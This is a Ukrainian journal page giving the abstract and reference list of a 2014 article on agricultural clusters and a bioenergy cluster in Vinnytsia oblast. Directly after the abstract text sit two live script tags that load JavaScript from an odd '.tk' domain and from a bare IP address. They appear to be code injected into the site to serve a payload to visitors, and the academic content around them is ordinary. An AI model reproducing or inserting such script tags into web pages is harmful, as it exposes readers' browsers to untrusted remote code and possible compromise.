ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.145:338.432
Сторінка молодого науковця

Роль кластерних утворень у розвитку вітчизняної аграрної економіки / Музичук М. М. // Економіка АПК. - 2014. - № 1 - С. 142

Розглядаються науково-теоретичні засади кластеризації аграрної економіки як напряму структурного упорядкування економічного простору; пропонуються підходи до визначення доцільності й ефективності кластерних утворень у сучасних умовах господарювання; наводиться зарубіжний та вітчизняний досвід утворення і функціонування кластерів. На прикладі створення інноваційно-технологічного кластера «Альтернативна біоенергетика» у Вінницькій області пропонуються технологія, зміст та завдання новоствореного кластерного утворення, програма виробництва біопалива в аграрних підприємствах регіону, формування інноваційної інфраструктури кластера, впровадження наукових технологій, організація виробничо-господарської діяльності, управління такого роду об’єднанням. Рис.: 1. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: кластер, кластерні утворення, аграрна економіка, біоенергетика, програма, інфраструктура, технологія, структура, управління

Список використаних джерел

 1. Історія економічних вчень: [підручник] [Л.Я. Корнійчук, Н.О. Татаренко, А.М. Поручник]; за ред. Л.Я. Корнійчука, Н.О. Татаренка. – К.: КНЕУ, 1999. – 564 с.
 2. Перру Ф. Экономика ХХ века // 25 ключевых книг по экономике / А. Бейтон, А. Козорла, К. Долло; пер. с франц. – Урал: ПТО, 1999. – 488 с.
 3. Буржуазная региональная теория и государственно-монополистическое регулирование производительных сил (критический анализ) [Л.Д. Сапожников, В.М. Смольников, В.А. Васильев]. – М.: Мысль, 1981. – 480 с.
 4. Caron H. St. John, Richard W. Ponder. Technology eluster versus industry clusters: resourses, networks, and regional advantages. Growth and ehanqe. Vol. 37. No.2 (June 2006), pp [141-171].
 5. Портер М. Конкуренция / М. Портер; пер. с англ. – М.: Изд. Дом “Вильямс”, 2005. – 608 с.
 6. Войнаренко М.П. Концепція кластерів – шлях до відродження виробництва на регіональному рівні / М.П. Войнаренко // Економіст. – 2000. – №1. – С. 29-33.
 7. Косач І.А. Функціонування кластерів в умовах сучасних економічних систем / І.А. Косач // Економіст. – 2008. – №3. – С. 30-34.
 8. Прохорова Н.Г. Кластеры в национальной экономике / Н.Г. Прохорова // Экономика региона. – 2007. – №18. – С. 20-24.
 9. Ковальова Ю.М. Механізм регулювання соціально-економічного розвитку регіону на основі формування кластерів / Ю.М. Ковальова // Актуальні проблеми економіки. – 2008. – №4. – С. 179-187.
 10. Постанова Кабінету Міністрів України “Про затвердження державної економічної програми “Створення в Україні інноваційної інфраструктури” на 2009-2013 рр. №447 від 14 травня 2008 р. // zakon2.rada.gov.ua.
 11. Постанова Президії НАН України “Про формування та функціонування інноваційних кластерів” від 08.07.2009 р. №220. // zakon2.rada.gov.ua.
 12. Закон України “Про наукову і науково-технічну діяльність” №1977-ХІІ від 07.08.2002 р. // zakon2.rada.gov.ua.
 13. Закон України “Про наукові парки” №1563 від 25.06.2009 р. // zakon2.rada.gov.ua.
Читати статтю: 14_01_142-145.pdf
Читати переклад статті: 1401muzychuk.pdf